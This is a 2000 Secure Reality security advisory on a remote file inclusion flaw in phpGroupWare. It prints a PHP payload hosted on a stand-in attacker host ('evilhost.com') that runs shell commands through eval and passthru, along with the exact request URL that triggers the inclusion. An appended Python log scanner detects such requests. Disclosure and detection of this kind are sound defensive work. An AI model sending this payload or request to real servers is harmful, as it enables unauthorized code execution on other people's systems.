
SRADV00006.txt

07 Dec 2000 | Reported by Secure Reality | Type: packetstorm | Source: packetstormsecurity.com

Remote command execution vulnerabilities in phpGroupWare affect versions below 0.9.7 on Unix systems.

Code
`=================================================  
Secure Reality Pty Ltd. Security Advisory #6 (SRADV00006)  
http://www.securereality.com.au  
=================================================  
  
[Title]  
Remote command execution vulnerabilities in phpGroupWare  
  
[Released]  
6/11/2000  
  
[Vulnerable]  
Versions below 0.9.7 under Unix  
  
[Overview]  
phpGroupWare is a multi-user web based groupware suite written in PHP.  
phpGroupWare is quite popular due to its integration of many aspects of  
group cooperation: email, calendaring, file sharing, to do lists, etc.  
  
phpGroupWare makes insecure calls to the include() function of PHP which can  
allow the inclusion of remote files, and thereby the execution of arbitrary  
commands on the remote web server with the permissions of the web server  
user, usually 'nobody'.  
  
[Impact]  
Remote command execution (with privileges as above)  
  
[Detail]  
This is an excellent example of another aspect of the remotely accessible  
include files issue that has been discussed in detail recently. The  
discussion has centered around the sensitive information that can be  
contained in include files and the fact that include files generally have  
the extension 'inc' and thus, if web accessible, are returned to the  
requestor in plain text.  
  
A common solution amongst freely available php scripts is to give include  
files the extension .inc.php. This causes the include file to always be  
processed by the PHP interpreter and therefore not return in plain text  
sensitive configuration information, like database passwords. Thus these  
programs can have easy installation (untar everything into the web space)  
without worrying about configuration disclosure.  
  
The problem however then becomes one of context. Code and configuration  
variables in include files tend to be highly interdependent, that is,  
certain files and data must have already been included before including a  
particular file. By directly requesting the files we can break the  
interdependence chain and cause data the include files could normally trust  
to become untrustworthy.  
  
Which leads us to the phpGroupWare vulnerability. We can directly request  
the library include files that make up the phpGroupWare API. One of these  
files, phpgw.inc.php, performs an include based on variables that should have  
been set as part of the call chain. By providing them ourselves we can  
determine the initial part of the following include statement:  
  
include($phpgw_info["server"]["include_root"] .  
"/phpgwapi/phpgw_info.inc.php");  
  
By providing $phpgw_info[server][include_root] as a form variable that  
points to a remote web server on which we can place files, we can get the  
script to retrieve /phpgwapi/phpgw_info.inc.php from that server and execute  
it.  
  
For example, if I had access to place files in a webspace  
http://evilhost.com/~shaun/ I would create a directory "phpgwapi" and place  
inside it a script called phpgw_info.inc.php with content like the  
following:  
  
<?php  
  
// PHP code to be executed  
$phpcode = '  
echo("Hi there!<BR>");  
passthru("id");  
';  
  
// If we were called via remote include, send the code to be  
// executed  
if (substr($HTTP_SERVER_VARS["HTTP_USER_AGENT"], 0, 3) == "PHP")  
echo("<?php $phpcode ?>");  
else  
// Otherwise we're being executed on the target web server already,  
// so simply evaluate the code  
eval($phpcode);  
  
exit();  
  
?>  
  
(This script is designed so that the server it is placed on can be PHP  
enabled and not result in the code being executed on the attacking machine)  
  
If we then make a request to the target machine like the following:  
  
/phpgroupware/inc/phpgwapi/phpgw.inc.php?phpgw_info[server][include_root]=http://evilhost.com/~shaun  
  
The code should be retrieved and executed.  
  
It should be noted there are some caveats to this attack:  
- The remote web server must be able to retrieve the file, i.e. no firewalls  
in the way  
- The remote web server must not be running PHP under Windows since remote  
file includes are not supported on this platform  
- The remote web server must be running a sufficiently recent version of PHP  
that [][] form variables are allowed  
- The remote web server must not have allow_url_fopen set off  
- Later versions of phpGroupWare check the variable  
$phpgw_info["server"]["header_version"] in phpgw.inc.php, for those versions  
we need to provide that via form variables too  
  
There may well be others based on other versions/configurations of PHP.  
  
[Fix]  
Please upgrade to the latest version of phpGroupWare (0.9.7) at  
http://sourceforge.net/project/showfiles.php?group_id=7305  
  
[Acknowledgements]  
Our thanks to all of the developers of phpGroupWare, in particular Dan  
Kuykendall, for their assistance in quickly correcting this issue.  
  
[Disclaimer]  
Advice, directions and instructions on security vulnerabilities in this  
advisory do not constitute: an endorsement of illegal behavior; a guarantee  
that protection measures will work; an endorsement of any product or  
solution or recommendations on behalf of Secure Reality Pty Ltd. Content is  
provided as is and Secure Reality Pty Ltd does not accept responsibility for  
any damage or injury caused as a result of its use.  
`
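
Added example, not part of the Secure Reality advisory or of phpGroupWare: a web access log check for the request pattern the [Detail] section describes, namely direct requests to library include files and, among those, requests whose parameters carry a remote URL. The log lines and hosts are constructed, and the names `classify` and `scan` are this example's own.

```python
import re
from urllib.parse import parse_qsl, unquote

# Constructed sample access-log lines; addresses and hosts are illustrative.
SAMPLE_LOG = [
    '203.0.113.9 - - [07/Dec/2000:10:01:02 +0000] "GET /phpgroupware/index.php HTTP/1.0" 200 5120',
    '203.0.113.9 - - [07/Dec/2000:10:01:09 +0000] "GET /phpgroupware/inc/phpgwapi/phpgw.inc.php'
    '?phpgw_info[server][include_root]=http://remote.example/~user HTTP/1.0" 200 48',
    '198.51.100.4 - - [07/Dec/2000:10:02:11 +0000] "GET /phpgroupware/inc/phpgwapi/phpgw.inc.php'
    '?phpgw_info%5Bserver%5D%5Binclude_root%5D=%68ttp%3A%2F%2Fremote.example HTTP/1.0" 200 48',
    '198.51.100.7 - - [07/Dec/2000:10:03:40 +0000] "GET /phpgroupware/inc/phpgwapi/phpgw.inc.php HTTP/1.0" 200 0',
    '192.0.2.33 - - [07/Dec/2000:10:04:05 +0000] "GET /phpgroupware/login.php?forward=http://intranet.example/ HTTP/1.0" 302 0',
]

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
REMOTE = re.compile(r'^\s*(?:https?|ftp)://', re.I)   # URL wrappers usable by include()
INCLUDE_EXT = ('.inc', '.inc.php')                    # library include naming from the advisory


def classify(line):
    """Return (finding, parameter_names) for a suspicious request, else None."""
    m = REQUEST.search(line)
    if not m:
        return None
    path, _, query = m.group(1).partition('?')
    # Only library include files are of interest; ordinary pages may carry URLs legitimately.
    if not unquote(path).lower().endswith(INCLUDE_EXT):
        return None
    # parse_qsl percent-decodes names and values, so %5B/%5D and encoded schemes are caught.
    remote = [k for k, v in parse_qsl(query, keep_blank_values=True) if REMOTE.match(v)]
    if remote:
        return ('remote-include-attempt', remote)
    return ('direct-include-request', [])


def scan(lines):
    """Return (line_number, finding, parameter_names) for every flagged line."""
    return [(n, *hit) for n, line in enumerate(lines, 1) if (hit := classify(line))]


if __name__ == '__main__':
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

POST bodies and cookies do not appear in an access log, so the lower-severity `direct-include-request` finding matters on its own: a library include file has no reason to be requested directly.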
